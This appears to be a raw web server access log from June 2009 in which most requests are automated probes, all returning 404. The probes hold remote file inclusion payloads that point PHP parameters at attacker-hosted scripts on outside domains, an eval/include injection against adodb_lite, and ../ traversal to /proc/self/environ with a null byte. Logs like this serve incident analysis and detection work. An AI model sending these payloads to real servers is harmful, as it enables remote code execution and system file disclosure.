193.243.139.4 - - [29/Jun/2009:08:04:10 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
67.18.98.186 - - [29/Jun/2009:08:04:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
67.18.98.186 - - [29/Jun/2009:08:04:10 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
67.18.98.186 - - [29/Jun/2009:08:04:10 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
193.243.139.4 - - [29/Jun/2009:08:04:13 -0700] "GET /phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.38.16.107 - - [29/Jun/2009:08:07:29 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
72.44.187.42 - - [29/Jun/2009:08:07:35 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
72.44.187.42 - - [29/Jun/2009:08:07:35 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.38.16.107 - - [29/Jun/2009:08:07:35 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.38.16.107 - - [29/Jun/2009:08:07:35 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
72.44.187.42 - - [29/Jun/2009:08:07:38 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
67.18.98.186 - - [29/Jun/2009:08:09:17 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
193.243.139.4 - - [29/Jun/2009:08:09:52 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.32.56.166 - - [29/Jun/2009:08:16:09 -0700] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
72.44.187.42 - - [29/Jun/2009:08:16:47 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:08:21:27 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:08:21:32 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:08:21:32 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:08:21:35 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:08:21:35 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:08:21:35 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:22:17 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:22:17 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:22:17 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
217.147.29.190 - - [29/Jun/2009:08:22:19 -0700] "GET /plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
217.147.29.190 - - [29/Jun/2009:08:22:22 -0700] "GET /logs/access.log%20%20//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
217.147.29.190 - - [29/Jun/2009:08:22:23 -0700] "GET /logs//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:22:24 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:22:24 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:22:24 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:22:24 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:22:24 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:22:24 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:25:27 -0700] "GET /logs/das-tolle-neue-amun-log_irc.html/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:25:27 -0700] "GET /das-tolle-neue-amun-log_irc.html/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:25:27 -0700] "GET /logs/access.log%20%20/das-tolle-neue-amun-log_irc.html/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:25:30 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:25:33 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:25:34 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:25:39 -0700] "GET /logs/access.log%20%20/das-tolle-neue-amun-log_irc.html/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:25:39 -0700] "GET /das-tolle-neue-amun-log_irc.html/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:25:39 -0700] "GET /logs/das-tolle-neue-amun-log_irc.html/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
217.147.29.190 - - [29/Jun/2009:08:31:17 -0700] "GET /logs/access.log//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:37:39 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:37:39 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:37:39 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:38:35 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:38:35 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:38:35 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:38:53 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:38:53 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:38:53 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:08:40:08 -0700] "GET /include/lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:08:40:08 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
122.153.28.140 - - [29/Jun/2009:08:40:08 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
64.186.128.233 - - [29/Jun/2009:08:44:00 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
64.186.128.233 - - [29/Jun/2009:08:44:00 -0700] "GET /include/lib.inc.php?site_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
64.186.128.233 - - [29/Jun/2009:08:44:00 -0700] "GET /logs//include/lib.inc.php?site_path=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
72.82.228.83 - - [29/Jun/2009:08:44:09 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
72.82.228.83 - - [29/Jun/2009:08:44:09 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
72.82.228.83 - - [29/Jun/2009:08:44:10 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.106 - - [29/Jun/2009:08:44:53 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
193.243.139.4 - - [29/Jun/2009:08:46:33 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
193.243.139.4 - - [29/Jun/2009:08:46:33 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
193.243.139.4 - - [29/Jun/2009:08:46:33 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
89.191.11.195 - - [29/Jun/2009:08:48:57 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.redneckmba.com"
89.191.11.195 - - [29/Jun/2009:08:48:58 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.redneckmba.com"
89.191.11.195 - - [29/Jun/2009:08:48:58 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
89.191.11.195 - - [29/Jun/2009:08:48:59 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
72.82.228.83 - - [29/Jun/2009:08:49:40 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
72.82.228.83 - - [29/Jun/2009:08:49:40 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
72.82.228.83 - - [29/Jun/2009:08:49:40 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.191.11.195 - - [29/Jun/2009:08:49:58 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.redneckmba.com"
89.191.11.195 - - [29/Jun/2009:08:49:58 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.redneckmba.com"
89.191.11.195 - - [29/Jun/2009:08:49:59 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.redneckmba.com"
89.191.11.195 - - [29/Jun/2009:08:49:59 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.redneckmba.com"
89.191.11.195 - - [29/Jun/2009:08:49:59 -0700] "GET /include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
89.191.11.195 - - [29/Jun/2009:08:49:59 -0700] "GET /logs//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
89.191.11.195 - - [29/Jun/2009:08:49:59 -0700] "GET /include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
89.191.11.195 - - [29/Jun/2009:08:49:59 -0700] "GET /logs//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
65.55.106.123 - - [29/Jun/2009:08:51:26 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
193.243.139.4 - - [29/Jun/2009:08:53:41 -0700] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:57:49 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:57:49 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:57:49 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:57:57 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:57:57 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:57:57 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:58:20 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:58:20 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:58:20 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.38.16.107 - - [29/Jun/2009:08:58:59 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:59:09 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:59:09 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:59:09 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:59:35 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:59:35 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:08:59:35 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:00:26 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:00:26 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:00:31 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
193.243.139.4 - - [29/Jun/2009:09:01:31 -0700] "GET /phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
193.243.139.4 - - [29/Jun/2009:09:01:31 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
193.243.139.4 - - [29/Jun/2009:09:01:31 -0700] "GET /logs/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:03:38 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:03:38 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:03:43 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
193.243.139.4 - - [29/Jun/2009:09:03:45 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
193.243.139.4 - - [29/Jun/2009:09:03:45 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
193.243.139.4 - - [29/Jun/2009:09:03:45 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:04:01 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:04:01 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
83.13.191.186 - - [29/Jun/2009:09:04:01 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
